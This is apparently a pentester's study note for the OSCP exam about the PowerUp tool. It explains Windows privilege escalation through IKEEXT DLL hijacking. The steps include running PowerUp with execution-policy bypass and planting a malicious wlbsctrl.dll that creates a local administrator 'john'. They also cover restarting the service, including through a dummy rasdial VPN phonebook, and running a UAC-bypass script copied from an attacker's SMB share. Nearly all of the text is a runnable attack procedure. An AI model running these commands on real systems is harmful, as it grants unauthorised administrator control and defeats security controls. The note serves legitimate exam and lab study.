PowerUp – Lisandre

PowerUp is part of the PowerSploit and the PowerShell Empire Framework. PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

💡 Officially allowed during the OSCP exam according to the OSCP Exam FAQ (part of PowerShell Empire, which is allowed).

PowerShell Empire
Documentation (GitHub)

DLL Hijacking

Invoke-WScriptBypassUAC

Location

Upload to the victim machine. See File Transfer.

/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1

Usage

powershell -exec bypass
Import-Module .\PowerUp.ps1

Execute all checks

Output any identifiable vulnerabilities along with specifications for any abuse functions. The -HTMLReport flag will also generate a COMPUTER.username.html version of the report.

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks | Out-String -Width 4096}"

Invoke-AllChecks | Out-String -Width 4096

Invoke-AllChecks -HTMLReport

DLL Hijacking

Write-HijackDll

Write-HijackDll [-DllPath] <String> [[-Architecture] <String>] [[-BatPath] <String>] [[-UserName] <String>]
 [[-Password] <String>] [[-LocalGroup] <String>] [[-Credential] <PSCredential>] [[-Command] <String>]

Write-HijackDll -DllPath 'C:\Users\<somepath>\<somedll>.dll'

wlbsctrl.dll

IKEEXT DLL Hijacking (wlbsctrl.dll)

Vulnerability in the IKEEXT service. A windows program looks for DLLs when it starts. If these DLL’s do not exist then it is possible to escalate privileges by placing a malicious DLL in the location where the application is looking for.

sc query IKEEXT

Write the missing DLL

Write the missing DLL wlbctrl.dll and restart the IKEEXT service. Use DLL path from Invoke-AllChecks output.

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Write-HijackDll -DllPath '<somepath>\wlbsctrl.dll'}"

powershell
Import-Module .\PowerUp.ps1

Write-HijackDll -DllPath 'C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

The debug.bat script creates a local administrator user (john / Password123!).

cd C:\Users\<username>\AppData\Local\Microsoft\WindowsApps
type debug.bat

Restarting the service IKEEXT service

Option1: restart the service

net stop IKEEXT
net start IKEEXT

Option2: reboot

shutdown /r

Option3: Use rasdial

svchost.exe starts the IKEEXT service, which then queries for the wlbsctrl.dll file.

Create this file:

C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\rasphone.pbk

[IKEEXT]
MEDIA=rastapi
Port=VPN2-0
Device=Wan Miniport (IKEv2)
DEVICE=vpn
PhoneNumber=127.0.0.1

Use the following command to use rasdialto connect to the dummy VPN.

rasdial IKEEXT test test /PHONEBOOK:rasphone.pbk

We can verify that our exploit was successful as there is a john user in the administrator group.

net localgroup administrators

Invoke-WScriptBypassUAC.ps1

Official Documentation.

Did not work (was not applicable to target tested).

cp /usr/share/powershell-empire/empire/server/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1 /home/kali/share

copy \\x.x.x.x\myshare\Invoke-WScriptBypassUAC.ps1 Invoke-WScriptBypassUAC.ps1

powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

# powershell.exe -exec bypass
.\Invoke-WScriptBypassUAC.ps1 -Command cmd.exe